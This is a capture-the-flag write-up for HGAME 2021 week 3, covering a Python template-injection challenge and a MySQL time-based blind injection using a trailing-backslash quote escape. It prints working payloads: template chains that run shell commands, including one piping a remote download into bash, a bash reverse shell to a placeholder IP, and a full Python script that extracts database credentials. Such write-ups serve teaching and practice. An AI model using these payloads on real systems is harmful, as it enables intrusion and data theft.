
HGAME 2021 week3

Author: wh1sper@星盟

Level – Week3 Forgetful

Key point: simple Python SSTI

The challenge is a notepad app. There is an SSTI when adding a description, and on the view page you can see that the SSTI has already succeeded:

The most standard payloads:

{{[].__class__.__mro__[1].__subclasses__()}}
{{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('ls /').read()}}
{{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('curl ip|bash').read()}}

Because there is a WAF on the command-execution step, you can instead just pop a reverse shell:

nc -lvnp 8888
bash -i >& /dev/tcp/ip/8888 0>&1

The technique is fairly standard;

Sharing a script for locating a module's index in [].__class__.__mro__[1].__subclasses__():

#python 3
import re

# paste the echoed output of {{[].__class__.__mro__[1].__subclasses__()}} here
echo = '''
[echoed output]
'''
classes = re.split(',', echo)
for i in range(0, len(classes)):
    # print the index of the subclass we want to use
    if 'catch_warnings' in classes[i]:
        print(i)
        break

iki-Jail

Key points: MySQL injection, single-quote escape

A familiar login box, a familiar SQL injection

I found that the username field has to be an email address, and that with Burp intercepting, some problems appeared that stopped the Ajax from working.

So I sent the requests to login.php directly from Burp;

After a simple fuzz, the filtered characters were as follows:

Since single and double quotes were filtered, I thought of escaping the single quote instead: when the username entered is admin\ (with a trailing backslash), the statement becomes:

SELECT * FROM user WHERE username='admin\' AND password='xxx'

The backslash escapes the quote that was meant to close the username, so the username literal runs on until the quote in front of xxx, and xxx itself is executed as SQL, giving us the injection;
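Added example (not from the writeup): a small model of the login query with a hypothetical quote-stripping filter like the challenge's, plus a scanner that applies MySQL's backslash-escape and '#'-comment rules to show where each string literal really ends. With the trailing backslash the password lands in SQL context; escaping the backslash as well (or, better, using a parameterised query) keeps it inside the literal. TEMPLATE, naive_filter, escape_mysql and is_injected are assumptions, not the challenge's code.

```python
TEMPLATE = "SELECT * FROM user WHERE username='{}' AND password='{}'"

def naive_filter(value):
    # Hypothetical filter modelled on the challenge: quotes are dropped,
    # but the backslash is left alone.
    return value.replace("'", "").replace('"', "")

def escape_mysql(value):
    # Escaping that also covers the backslash, so it can no longer swallow
    # the closing quote (a parameterised query is the real fix).
    return value.replace("\\", "\\\\").replace("'", "\\'")

def build_query(username, password, sanitize=naive_filter):
    # The vulnerable pattern from the challenge: filtered values concatenated
    # straight into the statement.
    return TEMPLATE.format(sanitize(username), sanitize(password))

def sql_context(query):
    """Split a statement into ('sql', text), ('str', text) and ('comment', text)
    pieces, following the MySQL rules that matter here: inside a single-quoted
    literal a backslash escapes the next character, and '#' outside a literal
    starts a comment that runs to the end of the statement."""
    pieces, buf, in_str, i = [], "", False, 0
    while i < len(query):
        c = query[i]
        if in_str and c == "\\" and i + 1 < len(query):
            buf += query[i:i + 2]  # escaped character stays inside the literal
            i += 2
            continue
        if not in_str and c == "#":
            pieces.append(("sql", buf))
            pieces.append(("comment", query[i:]))
            return pieces
        if c == "'":
            pieces.append(("str" if in_str else "sql", buf))
            buf, in_str = "", not in_str
        else:
            buf += c
        i += 1
    pieces.append(("str" if in_str else "sql", buf))
    return pieces

def is_injected(username, password, sanitize=naive_filter):
    """True when the SQL skeleton (everything outside literals and comments) of
    the built statement differs from the template's, i.e. part of a submitted
    value was parsed as SQL rather than as data."""
    def skeleton(q):
        return [t for kind, t in sql_context(q) if kind == "sql"]
    return skeleton(build_query(username, password, sanitize)) != skeleton(TEMPLATE.format("", ""))
```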

It turned out that only time-based (sleep) injection works:

exp:

#python3,wh1sper
import requests
import time

host = 'https://jailbreak.liki.link/login.php'


def mid(bot, top):
    return int(0.5 * (top + bot))


def transToHex(flag):
    # hex-encodes a string for use in a LIKE comparison (unused in the final run)
    res = ''
    for i in flag:
        res += hex(ord(i))
    res = '0x' + res.replace('0x', '')
    return res


def sqli():
    name = ''
    for j in range(1, 200):
        top = 126
        bot = 32
        while top > bot:
            # subqueries used stage by stage; each comment records what it returned
            # babyselect = '(database())'  # week3sqli
            # babyselect = "(select group_concat(table_name) from information_schema.TABLES where table_schema like database())"  # u5ers
            # babyselect = "(select group_concat(column_name) from information_schema.columns where table_name like 0x7535657273)"  # usern@me,p@ssword
            # babyselect = "(select `p@ssword` from week3sqli.u5ers)"  # sOme7hiNgseCretw4sHidd3n
            babyselect = "(select `usern@me` from week3sqli.u5ers)"  # admin
            payload = "^(if((ascii(substr({},{},1))>{}),1,sleep(2)))#".format(babyselect, j, mid(bot, top))
            data = {
                "username": "admin\\",  # trailing backslash escapes the closing quote
                "password": payload.replace(' ', '/**/')
                # ^(if((ascii(1)>55),sleep(3),sleep(3)))# this one did delay as expected
            }
            try:
                start = time.time()
                r = requests.post(url=host, data=data)
                print(data)
                print(time.time() - start)
                if time.time() - start < 1.5:
                    bot = mid(bot, top) + 1  # no delay: the character is > mid
                else:
                    top = mid(bot, top)      # delay: the character is <= mid
            except Exception:
                continue
        name += chr(top)
        print(name)


if __name__ == '__main__':
    sqli()
# hgame{7imeB4se_injeCti0n+hiDe~th3^5ecRets}

hgame{7imeB4se_injeCti0n+hiDe~th3^5ecRets}

Arknights

Key point: PHP deserialization
